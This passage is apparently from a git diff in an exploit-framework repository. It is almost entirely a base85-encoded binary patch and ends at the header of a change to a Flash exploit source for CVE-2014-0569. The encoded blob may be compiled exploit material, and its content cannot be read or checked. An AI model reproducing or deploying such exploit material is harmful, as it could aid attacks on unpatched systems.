z^B=jhwa>(JBo}ktX+Ic^%CyuNTs#cBT1&z{*q2!O%Y2%bf|aLjprDlV7(Vz|P&9{D
z^bOth3w^CPvSQbNk>cL;c+1`+q5+H}Covc@@FuuiI2^4P4HvOKd6r4vN<VG;;{=e@
zsK)Im#ACV!K2;^i=L}F5y^_&G6#lRKG`+n2CdloseSxqGvltso_GildhuPAe^gxBQ
zN-n`O^elf17NwB23FiR<eHz{&LH5Puo(?T@KsHZ^QCTH_lGuX~p#I+Hrj2j75xQ*y
zE)8(?iJjVhxy~-t^-8Gf_Y8eMDCCCgO6Y@`pm(>}X+i(`z4v0FLF9Mo$p9i#&65N&
z2ImHMCi^*Zs!4};d6EH_bem;I)gX2DD!G?CPcDem=_@T{Xwxp4EBM2~`&18($8*MK
zCS1fabBt+!EjBb*CK?m9;!vr(Qfi_~;aTm)=P@ztN39@N=S?u`6Nh2(QJ$DPAG=#Z
zqperReBx3q;qy=;G9{uPgso;;Q_*YkEy3d^qtLsFUG~?T*?iF1y^!?sBMZ$)f=A5x
zN*vI$wc7y!g@ifH)#kPiKsEbPD}FWV1`P(87AvcNgY_z3v=9xF06W!3!oU!>qNzb8
zuYr>;_yZhj@aG#Wz4_bFXT$==F*usWAo*lq)?1yt&mdqX<B-Qkyt^EVMv!`{1hurp
z05JIpIc72O7xz*eQJ)Ar@=IZ1-CE^?5fk{U!ci66cNo$WYXe&h*F_FU{z7|%LIsHU
z2&D;s%a6K-H+Dx4i%`ML6-;Y?7k=xdVUM!UJ~Y^@+BdN|{=~Wje?SLRp0YsTV%RXT
zgCifPG9!+kpZ0Z(aabenixV~SzfqI{-nS6FMnVgp`{AZsk+Xk0oYy$25`ggbPqbSU
zILVUS;7lQnLi{LrILNbTEv3lMW6CI{%xXJ-ydte+?m3ne2i|Up{SKC6KBugE2WZ1(
z8aECAAt?HOs%q1y3;vDa+b>+vCyIrJnOj55r2Grv>l0P?*!74RTp@+Ss=D4`=R%oE
zXwuIsti2g}XUMH6y6dvR`8Ra$We9o#6AHeN(Pdb#xdU#%L&~hypl)WUYJ-*p8li!I
zsC$y-+l9s!<d8jh1Q&E{){A(bT+bTvrkrsn$H+<w$cmgaDzSX9!ldPFhm(HEiq;n4
zPJ;fv7Yd#I!CpGL%e1;?G)M#gyJ|p>7eL)`xCM$02O4V!CIP=QcH>|mFpeVq4#G9R
z6NqWJ-mTkJhx$VO>sb{rdFBB|YP&suTuc5i9=ic7*J<>7xY_pU0YB33t9|d$WNru2
z3Va~!s}_D04-@R`XkR%c#IH|CJZw9p`Z0OT#;(;*Wpmi#x~kcrWyo^7+{V4N_v^64
z+sXf_d89U$=Az1tG{t05j+hY(O`-D|S&JWqnD;Z0#wW+r)5Vah+HmHM1j{0SA{A%C
zNt%vbT(PcF<D4?&_^XAaf&Yj!aG%8+*}eicjmrLSFT)!YQ6D{BBN>}nVY40e?41|Q
zT+w}UzJ*u7!h{Ew4+|=sC4MNorH#<rKhwO7gYvY;5J7sMa15xBvAn}LvVR-Q=qb=3
z>Pm+BF}|dRrhB919yUK=s^C(8tfyfH_GjI88=DJFPU8EwNcBATcerq3#PoWdY_}69
za|6zP*~NC7jeSv8fGOSSyg@EP4}NfzcDdAje7B@46!U=QR)0@G25HEKne8U<_S+Jq
z87bqF{gFaa9sahE>}Z@l-H&8N8p$Ct2D4Pi9y=2r*I`Tk)D##(IhL1yn3S<Xd31+#
zJVLw3YZze_&t}zB&+}vmTI8YSL=^lpBISyY45xC#h^=Ndc;m;t=(}4#c7rS1&x>MZ
zN}!4w0=sm2#Y>tk&Bptk=pk~5w<1D5<mAz_|654t9F5wJAQdJWmx4{aylE)_jLahr
zp!-s6z6*+)Wec9la_KjJ(XXGw@&&Awco-W2qUHU5`T%+=5KyOoq!?rxCui8@j~bKG
z_(;a2Eec48F5tKtDuu2pvzpAz?bB|CxQ*UH7oG0G?HAX}Opj(d3?hk#klrO8F<0@2
zx6Np`y}H5eGA0G1=@yJ?L?J-uvXStd>xqc6J9B%|HgTxkILtqPGVb7P1Tr7j)Pb>F
zoY1ELd7!gHz{+2&!k_M1s_b1|4T3aPl{9Hk=(5KH<<BL;pMwD!h&vL)0!;@n0rrlP
z3|(5eHTU28<)~YK;oeoBz)GEMgb8sB(@pN|bXyko2k++7z~YXslcC+4HM=_HWU;^S
z0&=zg!bNoLe>tXqZD%`)Q(X2xC#D*WWvzMRCsxBx^yl@m=I1Q3@I(y3SS1d@9y7t*
z)Jv5NA70B5>ZEt&BJv##_y$o*D0Yi;ER1aT>W9DT@-Wg6L6S1sWT>45S}W~xP*H=O
zVy<?FJYknavQ;p&gX!E(DF%dw{a008kq6rs4g-vAlw&7<E;5cmcum?wTc$EyEYlG_
zwq6P=%#Uud+D(6KI-+9#8=0AhwLQ{!bCFeS7`}>6M_H8R$vjmN#rRzc^NH*FQF!Sv
zMc*#EjfDHwQ?|u^&Tmxo1u$IXq&Nt2AxCbmYI8y}QAf*+)_nBp;_pxI<X)0xb6_Gu
zFNey6;5kZv!+1vC&gDa^7>UUPNl!&Y{Oc?~rCJN)kqH!25DAtQUeEL7!;@)ysqGjC
zTS{map%Fl6xVNjmwHhA((IFZavvz<kr+KH0uxNQc$8oYQZLrb;g^vt0q%TS@0D!aB
z0|u_R{~zKBMmDa<JZ=~2GVL4E^y8trP=X4D;tGa;D~KyI3A!3XeaCE5VDg*LzrRCB
zE7AUngdEsI<3j<=^1a<-IcmYrFat44-v0Rv4lLzZ*{6o*R~btwOqJtJU$-4tnvm$T
z6F{fID`Y^UQ8Celw$$HigP#tF{}mu3lVp(4B&=Fqju?NvlL`9yIxIYhj3oy0bi={H
zLb>06W~#s+Tkx#z{u=4qbNtsBGY;|m|KMI>$UMuOWU4vw+S1?*c0k`$6`HyqPioBc
z&|ek;l(uHnMy~h+@wKfOlx1#%j)q3;!!D${)rVH-E37yRS(AY_SUB-pzd`1N>P{a&
z5WzdKf?~N}TIg4|oZiG;UU4K5{B~eqRmmZLUA20~{7g@vE}&b82oUcXk#*z>kIUzS
z&Aiq6QNnMkM8%NBQjI46h6qPl!{e!vkDySQ)zH9C4UDuGTY2`$ZW2>Ofv%~yKcCSn
z#LP`d#u*<Az`lb7`g2J=2$;#!@(w$MlHUSzqW1sSd5~7Y@gMtZ#BX$%_VU)+`?NEE
zA|>{J2pj<j7(xeBX-2ed9IMQ0raXaH9;HomA+s~Cmmy}cLOI6qKdGf{h`x!PCO;Pi
zQazcD+EpV0{ni0{8Ze6EUy#4Tc{|3rN16r?kZmkw)_mDVTZ~*iFw`J9AU6^j<YAsl
z|0#7$jl|BpWTU6YrQ1Zw3uumXoBd9Id@!E^z!l!lVsH~V{jap6^PP2wHq3b1Stq~p
zYU824%!YCF^B?15fZ9B1s7X6n2@f+1(l=g<YUHgJ@E7}@Njj2F%8-?E4lqXAVpDYl
zVlj^SIko;K3nu7bx0t7tv%?9o`qf~bu#us($EW$KzGM@Va8#hg<H{K)JS%a3(`^-c
z`FO>Q%kt_Wnzq-{qc>*lcj-<+(1atps*VemfhbZ=jF!i9_DhXX{S70LSRw?5aCIYC
zp6Wq}rCAtIJTVG$sBRKy!vtqVn<Ws?_%8MEkQnA>%*{0k?d4r`*gc3z7*IRs4*!hq
zTF<GHWX`{V`Pc!Ff{-CtA1=>-X&AIuoLsueqOhDja}k7Ai9kA4k#41L=aK^81z3AY
zjo~LFK&N0yo9=O6rcFD?lf!Q_<LvPll%l#lgF%T*w6lYS3Y746Hu)iy;Cz65dS6jF
z&LPPO<{D8GusiKV9r<FTUU36ofe+Jfbjceb9@mO#KxdTDOv&*+U)7I)mUw9UOTQ|R
zaDly2S==dAj7fm>Ya_PSOHo`K9jFX+0^&m!t?>S{Hk9cNV8W+Y0TY|G<&6~}fhTSI
zSf2(hk<4=zW-4saj`lRf%7^{CPvgB6Q5w?_iw*LR5w{Iv9v$J+t+NlC#S@OH8@{Hq
zI}JqpVfC)m$-7dhBKk3Z)N6GyKP$AbY%HedaFIxYnyj%G8MF0#!9`{F?iKLs`$dLT
z8eN<X`)Vfuu!*iu%!tXhw3*E3{qhc{Lc&Z*#AaMa(*t8(umlg9d5ZdU5%2Wi!|PUt
z-wx-ftxYm<e;c~-9<FePMTt<8g^nP(6`QG}+eCSDLzxOQ`qempAB2=p!@1B5wwG)q
znX?|{*^o+nV)1(-)x0*cQLMkR7XhdytdCmUf)k8i4|ZPY%66n#I*_eppms@a$YC*d
z1O~o`04eb$EJ)Ta(B4h166S^sJKreGcyO_!Qr+7+<l#gxX8<_8(_@=_+-4a%<=x0C
zJUuWnMo5L9mE)U#V?6Oe>E3Z~tBh-4kq99mjt0mNDc2yRM0B@gV(S&2*$i%yVnn_>
z{+zsQsw!E+Lz!b<+4ys+r`oV~yl5>UY~R?l0UmTFj*%@JiLKc%Z;kzzQrQ&t_iyKM
z`AYcBe>X$BOZSL_NRViNsbCeF`F+E1rXd|7^xo>bZ|Jsv?KGTTKG2A&p3JW3Y`ru7
z4PC=51vY+(MpDuu34FrCRWh{U2<YW9PvN7f9&ys5`DsQ9q}!ul{jN-tuWNTY>hF4F
z?;v-gYSn7%J-!5rV#{eihti^eqH2?k=?;*p6(p<qC$goH@<?NRy-=Q9725(&1Q@21
zOcB}1^Qr59Mf`b9r!TZ~@pPNPE+AdUf-c)ePVc$+YY*zqKIm<J1`xXD_i+~Hjw~YP
z=_B^r0Ml$YKPQ-Xtf*g*wTy;R;nYEh60!nBHIeTe9@`dH=yQ(mIT@6}=^O{;NeO0r
z^-~9-)<d>(S=*MpWT<uL;HeQ}Eowb>M$~!58f$-lcaQ_rxX?h_d#9fZ%49w6(~K=6
zK=EQh+`E6YkW#~{*)%5%xD+IWm6pK^V&y08R)B5Q?Z~rV`hX!9{OO(-TQJ~W@H?UX
z^r668Q|qKnH@X%W^_EaN>kI&;v(>0?5Bzaqh{!@b$9*;t$;^(gwwu{^Uy8F6K@xv2
z+PijtCJ1awXKft3A#OFc*01@S3XCpM!PnvFRDhE*yqrmcm$<b}??-S7D2rYko%Q%+
zM`WzCURK%Bs;}+7U$0)xH=0;G{sMJl%l8A=Qj|fS$EC6s^v0^xM!0V?PcYTs<-2+u
z179z=5+3e~qG_}-MQ=Rem{T}Xh^n;GLjd-FgxPo3J{_G85u{NdHWf`7f-=pYSO(LN
zKq{>|jGeGjFT>%SG7ju}i8BigWz>bba;RECsMrlN6^|2ebW`n`6qVxD9sV7P7i;MD
z+&eao9I`LWsaNxPK9s-`fP_5i*tD|22nz0=yf2I(O7#gu)3HG;jLRxto9-P13t!HE
zI1#8!$1?2)`ZzN4Jdd0h!HFNjbn1G4%)?*mO&IX}0bxts2u?ceIB`?B3)Du3zF#`#
zfs&H8Dkx=d9&S}u!-Rut<rrPC{YMb=&XD^m=0%caV*K-Yu%W>5J~W^=7Z7N7A0N7{
z=cM+I=$^!jNMr^yn=smcL6I&Tod~>tSa6?(5`n6#2IYld5OY0G6JfVbZL<wy?t@%)
zS;;+qzH-vQjPum#%Gc`^HwL?%$G>-W9D8&PUwzkD5OBxAaeApr!4%>Vtu@1!y?7!$
z3;+;q`TgH}7r4^Vd%PH{_3@T9@=hc2liz#`!65$J8}Y2ZN>$rAmdOe7LaIK06eb|v
zHbZo54aM6IkqKisM$V=fmV78d!b9t&imQtbHD^1D_5f}%e?L(t9JFF2QWLjqZoLFg
z5!&A{N=++S-WD8=e>B*4y-ctH<FUG<d6KS<sfJ0?2m@vgrMXWwC^!gb=Z}*ZZD*z$
zutO*PKisZ0L=cvoF!@~`{`+lz2&D^Q(Av@ebto%f*{u0)Idoh{mp~LY59~D+I-s)m
z8GWdxy{oiW>K4j@z9{4UqLsXBlu>9+T+#cJNmRNHV6a(?Sfu&~x+`snuJOlzr_S1C
z0L651xae?NC}^x^5}xRsL@;WMLb-IZI%OE}H1;XH-WaPh{zCk>&>G@@CCk9)X|k^<
z-JZw(jmLOe4=)PKx&S2{tv6aOKIc;A6-8<Ty-A!!<!U(EIbz)tM^9}|<T(u|Zi_OR
z1a(GV8|R^N$HE%$y_dM6X2~4(DyrTUpgmQDNtCWVz!pmZT6Hsr;#dKxY2wbeq#!GF
zj#v=3!_c4J!u`K+sL0oUHjF~g9_b0h1de?O(NN+)xxS$PhIsHmvk^aIu}pEK9LBai
z^%viPzT;_2;!dYyPk<ZDA<8X8yqXo)EGkRubDzYsJ(jiOU%ep4y-m|#T&cl!+zLtG
z-bA;e-g@}gQH9Lgd-La4nbOzT)2Y<S9gtDn^{TyP?a9O7r7ACfq^0brIQ}4S8Ytv9
zc_Rs#Y{|=7UU*aj*y5a*6nJz!caM()p%np<mDS^rcJq5ix}`!aYzw=!*Vf#>ubxng
z6;7>ELL2gFNz6(g;Iz*r)MEq_e=r&(CiVo!cK<UUo$;(5=MaWH6%HdU`!G<sdghZc
zeyt<}@8LXGSkw@Iue<IJ2beplkB>N24Xb7PuyHzzfeZqe4^ey{LBxq*o8mO#W*3)E
zqI$?s6p({j1ggp;&zBkY8F?4eYeVjJHN)~57I9{9Bl}s@Zz#9To>ijyJd7->n_B72
zxU#jnBjM-?m8s1zI>5fkE~rR07e&)Jex9==+hWnhappvSWRg9#5%6j<xXi*rf0?_V
z(5v#o{!wvP(mFolY;vMR|4Hx*SE?ynH|pxfW=Nd&r*Ha-V2`D11vLLo%xm3*qYH%A
z7F$RDV$XQwQ_F~XQ%Ad1taH4cq++e|CzNXmzJ@1}Uo@u+w4$1*aEtp!!f97nJ%@Df
z06OqDoDiOW@K9Ohi=FRt<H+E<x%WVWw0ZF?^-vc|W2ssh3jg3Y&2?}hagY%)_=UFM
z^rWXkYp1S~r5$DBCHpr^5EQuI+#CJcB)P>avQ+^bAOM-FZ^gr%QB|e9`6@7osMqyH
z6F=rS9ff9$(Wlq|JY39M_O%TXubHW02aL1oh^Qiezbo$$=rD>1QU#uoImz|;(zR7i
z*l8M#d7)9#)QcnyLwGC$oP%yMZlA^m19D7#rodZ@!q0AAR~KdP)RZ1k{KD1*qn)Hh
z{cj9GzhHZ{cqmTq`>dDBBHBlaxR6kqE4J$;$?8N$xWCSZRW33Z8`3Ur{_3i&Jmga{
zhi+<rYbAmgZjE>Qte@Op4oMOp3eAN@X7r<U`bH>`ol);<JxOr`_doe^lm7J2r@DL_
zxo3v`*M~w~wB>C=z@SE-iW1DluhuoWe1|rrAMC&iZJG(t40|Ctro#vyox*%v?D-`|
za~k)s2umZJpQLcD0>6}ys&OqE^$0sWxQf4jco?YX`N~YZg!5QUEX=8={QfIEAk6(o
zxZSN3aWYuXQI4;{#!EXaTPb;p7(Z2{LJVbG=T)jU@E9$Lz*hs+fS>;E4ub*P)FC`y
zP1NN+*FCyRVP{0`GV1^%pDMp%(4u{mXh!>HpacPLmU`at%~6U11*oGd`|eRZ+S;gp
zcJ+_tq94$IigbB|fWv#ONWX-?rzuJ<T&peKq^<1}ZvtgyiP+n9mNBh2L={<_6Vay#
zDy(f8o7sDc(pV69mI8GgzU<nN{fwamunql`b7EW<CWRe)1gLrlcN`iW3m`-&Nr$%b
z*2SWrjXOpn2clfvI9eH)u*}tgH<LntYOlB6sYr5@q*^z>po;I37qXQNkFW!oa+nB&
zI`G4cYnc0>v0iMm=ZZtK!L%G2DTGAtZP<j$h88=Y)hMHwq-{D<*uf990j~RAX(<+8
zDW&|e=mDWoI*hMnDOdWiSL@SPOHWV+!z+$ZFE0N8G2ImzK`6|^2pen#&`k}0ta@n@
z#-uPKm73o3!N<%kyOhSyaXHijD4**7or>=zDq%Ksc+o%IrU#}0EGJa61~gi1wXS=H
zi>|6{(X<1U^nC4#(ox&-&9$Z+->t4dfF>f7r}ZKNgb2Qol9iLB3GqSkPIJf8l5BAl
z>hk+DXBT0JukZyoO+bHOOUf*Nvt~;VkY2)uYK?KDgNt(?IhR^3#Iapk7MZ)Hme~l*
z8as6@pvVrGa0yTgh|q>O^5)z`^AUW`zIJBHHmVqL%iUjji3r0zSL1MIAMDD1#MjCN
zr_&lvK@H;Vk)f|&g{~v#;NoIxzVph}PK0^)pk?X7nv4H)?<$Sci8=y*08TJOiOI2D
zTQSq8*P9B{JjeLk3N^g*JohG>+pch@M_G{_KVwM~FY7YRO2sW0TM>l-1*30)&WOQC
zRx)wQx8!GZQn}p^_Ah|#Jh(SXmy{y3K5k)&!EiWnr8N~7L-3Wsl9vL`(~R@14=Dyw
zXN`LKH;)H06S-Ly$P^iWzS-K$!I$!6&_%kvVZ2bfSTn_dY*`fKBzau-T@HJ9**LS1
zDLZxU(U=GgOZ?9lycIrd5i<DX5hrt|qfI3Lqr$0TVu!+vTZZtWH0-+ep~wU)^fQg~
zB(vmc;oVj~dimOd8a)oSAkJYtkSziPxpTO96?6+H3ogBYs^=|#;a(3tQptON>#}1x
zb<1$I9>XF+7f?wi#j0xaey_z{e^Mi5n`?h|<2mSBR$T8wCMe53(5?m(9cWZFTVPlG
zIEwgYGZYRCO7x8lq=iU1(->gX;ZwmzGoQv;yj^`SYS~^B(p5pNHn2qXXa3`E9xyYR
zq~=QNda})hx|REX159>xZip)r|CI^y(v9fZge??&J~F4A_JmuL{MYC>;lxR*B_s*c
z)lVW3=<LwN(|Eva6^L2ixhC?=cBAX1roZT5l(QUnEDvRe2Gg(jjXIBQxu^&ruU-84
z?b}P`E7;}irM*F5rgCenG|ppCL&alY-uDT7nU|Fu6lS}B=0~n2f$2`#JWyQojla+F
zp2vksfFKefit?1tsX<br>^mFwudQ=|p{9JQ8b(<8ebV6!=VhIMtS%yj<C*y9*`XWJ
z^19MoYtgC=ir*u5#W}w?RSa~v3oIX>22d>6c8SE`C_AH-)T*ry;FDm>dk4}55^4Jf
z#HZCsdb_rNVqtX%nDJ3bF=*nA*JBiJlLo^tm*Nw9_Yc)6`)-k#_3WLO<{ml_lLL!E
z2J}patxGuLH03wDQVKZdZ3U5iM<Q|;b<7AWsQ9}MEVR9KNQ7|^DE&BN;N{QW?)Q~^
z-GcCUqwvvVuh+K^ubU~oux5@OP*EcVaxHH5@;{7!vF5M=WaQT^k*~KP6T@9{DgGX)
zQc8)q!|L{()&1)@!>=N18Dc}>)(aP-f7Y^ba;R@`TrbXtxpB;!diLIcB~EK3`<xc-
zwJ1m|#Nqwcc*!wLMRwDT`p(Npr%ysdOspN&Sd<J0L<`>bcy3*?c!qv7t2;<SsQT%g
zcJCp7a*5Yui68aGT>#g)?fGgmKIaLAh&Xoh3=hdkXnSj|T~4~G&>V7S1_^w9VgO*Q
z#~e|%&MwcNwRq5O4y>x(wFH#Z2fIrm;#jB2oyE`PqJTSQx0`}map6nj{^zpaU7;Y>
zHxmUT(g!WdQLdyUO<bXRNqqsU5LEATz)o=KP`GPFe?*Ucf}+pS=kg_Q4?9J)V9bSc
z7IFV_KL+{Bz;~5Ldekc`oM`+PAeIsGK{IDUtLHdo{G4wR#H~2szRgtC;YdsghsxQB
zw+3iJA)h-)dlkc8Lvxs2REBh%25Y1d@3T^#3s>nKY8w*&!p=QQX)`;1uJzq%IKe6n
z-*_|$e-tS*D{8fo^1YXyD)9A#2(G|@J>ExwR7Hk_7Kcs`vwyyF&iqcR!T7~k&WieK
zM)qX8fY~AV?Lq337ZM9^-vKu2MkI0^OR7C6{uMyxGtSpP-D~ZMh;~NsS5Z!h9NtRY
z_8*S_T>0P3eJl-{k?Uz0>Hg{sRAuWhg|8{(e{KMsh<z-8qb6I}=cCIi%H9wQ(KDc3
zoFn#4Y+-cj>qieE&$;NKGXOUb`2pCzd{7Ptf}T&zV4zy5g(4L91((z$y~h8%fMl1<
z8q&nu=2!iNrv)udwCaqzPxUCKV@R0P{vK|6&A*Emy~fl7#)5aW?9c3(soAot(yLH|
zf3wu+Q{5#;<Q)$%C)^#FxSmaMn}pF88OgG3>mz>>;A7b<{!_2rs!3{*kZeadST#`R
zpiJMBs0qgKT*FM^Rv}pGQv#W+8s2-Y0MCrm^=wq6GUe#g8opo_gqGCWHJx2M>V?*a
zz#Ip}=6kC&0~F`zFWXA91{_0=PgVJXe-3OTEYAw%O9FEH$mIRRSeFrv(&rfLF$5IL
z#px&v;3fEt{JP(U4Txftw~~3HU~wc1xin{mfE1g1MI0<_Jq~)V=f!nlX#&#$0%&<n
zxnj-uFr7NFaBXTyj!ISq$m+vZvY;ofD-|^x6%p3~n6rdf*fuKNWHHQe9i-l*fA*AV
zi2|daS8~zOXxwsNYNSThSozw7Fix5JW<BG3Xq<pLc#inr3R=TRQQhGKxv93XjuN{m
z?4@e)Rt&wudXgry)Y8YUIt)TnuIY|IYPE>hg_x;U%|O3>=sVcl<yG@ev2eXja|N5w
zm|0XQnS?D{qDnYilB5bo0Fe0{f1Oi~X2`GEi_b`5%q;Eyk%h7*-NH-}pFR;a(b~5y
z`D626S)PhVPIp?xMAXfp$O#HS2%iGm9G5QRxE7VJiz}0+c1h|UDPSPLUVi?YQ;QmB
zXF5Hx>C{lJUwv;1ZNO7lRy$#!bDvdy;JAAyJ0E37H90T#F&*V5O6>4Je+zZN!88`k
z>$5qZY8;iF`@AJuRU}Wn0oECv!r#u7^=(+J-T91@1bj>RJe#k1yLt)q%*S&thh(yE
zhwi%td*y;5l09l?wghRcrf*jMQx(%xXfckr4>V3cgK5i%LUs<eIsA+lf96G|d>msc
z)>ZstXEV_IR);quR$J_+e`5Tv`jLe3!`@eQ+xHw+CnMK`>eLDaX}%D;=NHu?*rpm1
z^s8x#dm{k^Oz$Q&O--rpR33^xuCiHY2TyYqVFLq>kX_WZF%qk6WO;&Se+pOI&CdM(
zg5``sdZ#T)z>I-JnZ8!F*{DD#2M~r?v!^2g`YMg#%l44S`iAF6e@nguiLd37+ERv~
z-B;Z#2f`<dNRhB|Uia!itp72(o5V6T4T#5nmXEWNQSX|CnPTg<Hk7SN@#*(ppJsN5
zbEQA=ns?6ME&vj;w@EPRjBJHn(bHB^GqhDdK%e!qa$z(q;nZIQaT<W3f5HBsi!Gc1
z??#@|k2OBE<+F*2e{h`_i^g8w7?6nW@cl3~2cwg-3Y>S?eVYTTtd8;W7!=z`OOsaN
z#Uwv&DeL9WQ~VI!pOn^xe0_#XGZ(T*DeptmWCn+OYJO93uSwbsJjM&*9Vy^#{8EVJ
z=s*gU-rA}<gYJR;nV%)=lV+~*sL3-6mw640x0w)%x;7UZf2*ROZk>!6w<K-Pw}LbU
zT5^?61X9wl1%vb&LfI!XAq$Imqe&K(C4!;}q4W%qk7hB9%C_m1DF3J&8JAAVK=0FP
zBC^D#X(aj5xy!U&ffQ=-Ti2lFom|e%@w!9VJ)Fr#P6NOg7x1k_&QW@VAj-|@0C#<}
z7Og^LLP-ZJe`m6p-;6tj4iikXqdB(k;;ZcDD*}aL2csUN>mjBndVUBvH-TCUUZC|*
z1+RjiN8`m{t0{!qZz{;Um7a9ipcC~tL)Yr)8~i%U3i$eI27LuI#iP+h2kDP}^C$E@
zD8Cjcjg{9<o;)P!7*Mg%s6}k|Na?j;4I_&04UyP3f4f43^YC~(HeiTbkh|}QxU_K%
zty7d~$ekdN43>q6SoO)RV{0d(lwP={6?eDXj=AK<cTdjBWx~B<+?nZ03bV0io1$Fe
zjcS@5Mqq@*0Hk7Qp#52|Yk>voBj#%sO+)-_3jl8^D$Bq7mW3B$S&RupQSp@pS;GNG
z{NdD;e|(6}#}{`JSXvc$_H`g@kI=aed1w^}qeP{TF@KfwG?)1f_x))SSN;xM#V=RJ
z4H&?=w&tE3zrZJ6n9&w$SKVKHs5O767>N`!q^z@{KzwJhqE}31&>KPVJ{~7g|29LF
zmUgewdP;NVn*Mq^!<?r;W_q1@T5vqfs;n)Tf5h9O^mPWHg(+u(fWE+@m0^F~2Hd0f
zo{yQalP~3nT}OP-C#!T)q(Ki-brJN(y}!b4HeLl7cxJ~5mP|r;D+NxnBw=-|T-a7s
z87*o`j_y8T!If2bCmC$2J=2vC9Oj19%ZiWif{25ee-S1bgxDJ_0Jl=$fQAu7YMv`O
zf53C8Gw~EmA+C84ZeZnT2<Ah+{{Dq?vdz`|Y`DMk?BJYX+&nN3QoISdZjIABGNV#Y
z^O$Pfbzw&8m^5<p16a9qTOYXte2OiOn1s4}X23s>?$P=8qcb+?BqYqRM;c?Ua%%@i
zD1zFPe8+t7U0h$*z~*T_%!(X3Fb_vbf1*~Ko6R2!@k$@Js8UL;a+l2VNh@$AMy8jN
z@4WN7+4-4^$m}XU-??34^g;0IB6O`JAF4q?EdqRd?-Iv1KP{kgW*xRlWXexxc=^MP
zK)?FJZ*m5mTXCvTkORZXC2xxC;ws6N{Uliv)UY%dwfj8xQUvY7uZT_aA`B~+f1FWO
zz&!|4G~!>?OlDZv?Z#JYgU3PmJ#9}6*caB{d5gA!N}Q^!6sa$9$!QdT0)^NTrDMXM
zKr4ve7KM0W<B6qd*R{|y{<WyG-9sf;XZKy{cQ+3!e5cDg$o@b4hlJf9Ev7>1y!w*f
z+C_Q2d}CdT)-aKFnAdT$j#RfZf79!AC<l~=U5Ax|=!cTLHOgvm212a@>>^WCr}C34
zfN)fpR9Thkn)|Ej6Ic%eHsY*%JyiR8f@CQjVDH@LxwgUG_cmMCY4|D+zgNo@`tYeg
zH(U>qZwd5`%=v6sjg{QP@(ZYx3TDHISI)7NXHar?S70*GBy6QNU3l&jf8HNh6A<%{
zo4rdF5(Rfma9;nJ)1D^|dVHS3S#nd)tVQJ`U`>@I6isf74=gEf90d>tYe@q<EQKIg
zs(=W%7aM_du&hXL_?=;@YSWeM4g_gy%TqXd+7(fG%pU_L$`Zi}O|Bx<mxXWO&PFuu
zn`%=rPUlfFW$wZlbwU^ve<HJ1iL{?ePlSMBulOCC(d}es!m<(<eN$xOPAryJG7>ld
zZOj?pJ1Fb>6lVBQUZ5##+Gr=g>AHa>D#KIP!tW$i7V>`IvF}7aiVoXuX};t3+Td^D
zT!Z#uU^~XL@$CFLR8BX>Ys~cAwUnM2Zamz#lQ9<WdSs-%!=Kz6e>O!llgPA4bj4(A
z0uO_&kL7-F!+PSXy^K(I4;v%Q(O&OUwLBvI;!d*k!=H-IOAK7&I^-mPq594dMd+&H
zJe!Z#z^|qKl_*~l75(JnJLj$}K-)fj()y=0KOxB<UjO07T3Qi1916QszhD<c!39}O
zR0~}94K`R*5?d!Of3(5hQ)4=I+E<3BM1K8xbh_iS4r-5IvKygxdA@w(InkHFrP?ts
zT^rH%Pvb@&uREkkxB5-*!D*OctCtegknv~ZxlYfH{JW0a>{nAlOQ^>u%GdJRziHs8
z?pHe-7-Uhmmu7~BcRZE?ImWqd6f<=m3y$d-J&!-hqJI9Mf0tfMmM4zNg;EvvXG!#=
zc`?nq1G3BWqU#5Mx-nTa$9?DSMeytd2p38J@_NmhBTyV-|I_f+t1s$mv#mD_;5x|&
zhwiu+80x1Gh&HI@5(nHu_-(WQ!mxA~%BG!uRnF+x0y+N^wioK4WkbjG1q?dwANMxg
zQi>uPH>bRnf0k+mA=Ya~j74eyM9uy<Y&;sk%VEm~;U~L$iZ^;@Ok;Dro+S}ZaJqWC
zlRO?g%{MEs@G3*-p*}txK+R#XId(g3$C{Jjr#aB3oA>ymO85M5-2BjtD0jy5Fl?g7
zDslgG0RQ97>g4S7k;7YugD6<TL}F9VNo0`A9D%A|e+7u-0qODkmZjl1I**7N8;7B6
z;;f|gacURW$jdWB1iE3p?Cpo~q^pZkazj77(*afVPu)Ogz%^>gmvgmMJx+Gf(#mG-
z?CN*w#qi`;<Daxq`U1)a_x0TP$)0pmTA{-KOGj2DW&O;bqou2o9u*Tk%7ETkNrmLp
z?G`#ff3>q#N%$V{n%Z9BImo{Pg5^YZc}K`LltDOYF!NyRQn?hf5L9EY`{qFgb8l>k
z)|r`+dqzS~rC?O<*IU!wFT6jOt0OXm)wKbta7|ZF*fd%QF+4-#4j#rPEQ241h?%#7
z`U!kr_51(#$aro}z>2E{RJ1HCy^3QtP-NN(e^}SdiBpNhFiWc1@7>k^*J31_C_zSX
zT!~avTqk>wX`!8ad^KB*T8$m)l`V(fm^i<-yJN=En&ma1|DwJuS6vnkct^I~AEHU}
zQ;Ac@pe8XK$67?d-Q9DvxU~%iO=S>hww-S)9N?fci>s<v$mZJ7Y2;0G$YU^`8*GWs
zf75PdWyp>6#IBen){0^<S9TWXb=fs{j;;m!05>bVyld*XXOs$&Ha;9(7TiU2EsKtf
zn}DQp4VbTMlJ{y;;flsrmJ};HGwd=1+aYjDYB&Sm!7K`okAxwTwwqo391hklw65R|
z2O8xf`PsG}cZg>Ck^P`Q+EV%nt3?e}e<IdviDF+#GC&E4^`C9VA8By}jwO2hRu`uZ
zS`>8oY}I@!ua)9saY_H3|0m7mNZ9;tb5su}|2ELMZAfS<m50~-?C&Vm;fuxf{;Zoy
zb^xprRP*p6(g#8V4EWZ_ek=sgffU7HmxVxZ!uc9Bu0=~Lp9%13<l0Q0x}<gte;UYb
zT+ac^fPwViwx+T&c<rx6e@DNV@oV3M@n$}4WTtHfDGGYNLX5t1x$G6>`xq&YrpqWJ
zynLQC*8su`{9^w*aWipuLn6P{LnFhi!)wy6n6L0<34U|MILNqj0PD<Ca`#stg2?IJ
z))E-de+)^B{NVrXc4x5NUL(!We-RPJn)45l#Oh5z4+AktH=i=Apkjl|=V}0IGL2T<
z%429CIRY@Q{=|wzs<Tu{W8ZqwwYk^x&Ms3S0O+LxR1w@0@IHmp^A{?D2oYHQT2058
z(WDFG4l!K`p2|A9g3*>W@4w<PO$iNaFjtq=1V%}nN#l;>y6MO;nuCytAtwtk$J{*8
dzSfQD<dl@Rfu^|+&F2+H`24dXVE^)aaER?}V)_68

diff --git a/external/source/exploits/CVE-2014-0569/Exploit.as b/external/source/exploits/CVE-2014-0569/Exploit.as
index bf836bf0e1..f6a9fe5dcc 100755
--- a/external/source/exploits/CVE-2014-0569/Exploit.as
